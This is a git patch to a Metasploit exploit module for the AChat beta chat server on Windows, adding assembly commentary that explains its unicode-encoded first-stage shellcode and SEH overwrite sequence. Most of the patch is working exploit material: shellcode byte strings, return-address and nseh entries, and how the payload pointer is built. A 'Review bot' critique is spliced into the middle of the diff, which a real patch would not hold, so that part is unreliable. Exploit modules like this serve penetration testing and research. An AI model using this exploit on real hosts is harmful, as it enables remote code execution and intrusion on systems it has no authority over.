From c7880ab4e15f08caed7d465ed49a0aa0133196a5 Mon Sep 17 00:00:00 2001
From: Balazs Bucsay
Date: Mon, 9 Feb 2015 23:21:38 +0100
Subject: [PATCH] hex strings related explanations
---
 modules/exploits/windows/misc/achat_beta.rb | 35 +++++++++++++++++++++
 1 file changed, 35 insertions(+)
diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb
index 7a3ae5c309..9ce82d1951 100644
--- a/modules/exploits/windows/misc/achat_beta.rb
+++ b/modules/exploits/windows/misc/achat_beta.rb
@@ -67,6 +67,22 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     connect_udp
 
+    # 0055 00 ADD BYTE PTR SS:[EBP],DL # padding
+    # 2A00 SUB AL,BYTE PTR DS:[EAX] # padding
+    # 55 PUSH EBP # ebp holds a close pointer to the payload
+    # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
+    # 58 POP EAX # mov eax, ebp
+    # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
+    # 05 00140011 ADD EAX,11001400 # adjusting eax
+    # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
+    # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100
+    # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
+    # 50 PUSH EAX # eax points to the start of the shellcode
+    # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
+    # 58 POP EAX # padding
+    # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
+    # 59 POP ECX # padding
+    # 0039 ADD BYTE PTR DS:[ECX],BH # padding
     firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
     encoder = framework.encoders.create('x86/unicode_mixed')
     encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
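Review bot: The `# padding` label on the `ADD BYTE PTR SS:[EBP],DL`, `ADD BYTE PTR DS:[ESI],CH`, `ADD BYTE PTR DS:[EBX],AL` and `ADD BYTE PTR DS:[ECX],BH` lines of the new listing understates what those bytes do: each one is a store through a register and `SUB AL,BYTE PTR DS:[EAX]` is a load, so the first stage only runs cleanly if EBP, ESI, EBX and ECX hold writable addresses and EAX a readable one at that point, a precondition the comments should state rather than hide behind "padding". The listing also begins with `0055 00`, whose leading `00` is not part of `firststage` but the NUL after the `"\x2A"` that the second hunk shows being prepended to it (`sploit << "\x2A" + firststage`), so the decoding shown is only valid at that alignment. I would add above the listing: `# Decoded starting on the NUL after the "\x2A" prepended to firststage; the "padding" ADDs are real stores` / `# through EBP/ESI/EBX/ECX (and SUB reads [EAX]), so those registers must hold valid addresses when this runs.` The body of `exploit` continues past the end of this hunk.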
@@ -78,7 +94,26 @@ class Metasploit3 < Msf::Exploit::Remote
     sploit << "\x61\x40" # POPAD + INC EAX
     sploit << target.ret # AChat.exe p/p/r address
+    # adjusting the first thread's unicode payload, tricky asm-fu
+    # the first seh exception jumps here, firststage variable will be executed
+    # by the second seh exception as well. It needs to be in sync with the second
+    # thread, so that is why we adjust eax/ebp to have a close pointer to the
+    # payload, then firststage variable will take the rest of the job.
+    # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
+    # 55 PUSH EBP # ebp with close pointer to payload
+    # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
+    # 58 POP EAX # put ebp to eax
+    # 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
+    # 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
+    # 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
+    # 05 00140011 ADD EAX,11001400 # more adjusting
+    # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
+    # 2D 00130011 SUB EAX,11001300 # lea eax, eax+100
+    # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
+    # 50 PUSH EAX # saving eax
+    # 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
+    # 5D POP EBP # mov ebp, eax
     sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
     sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
     sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX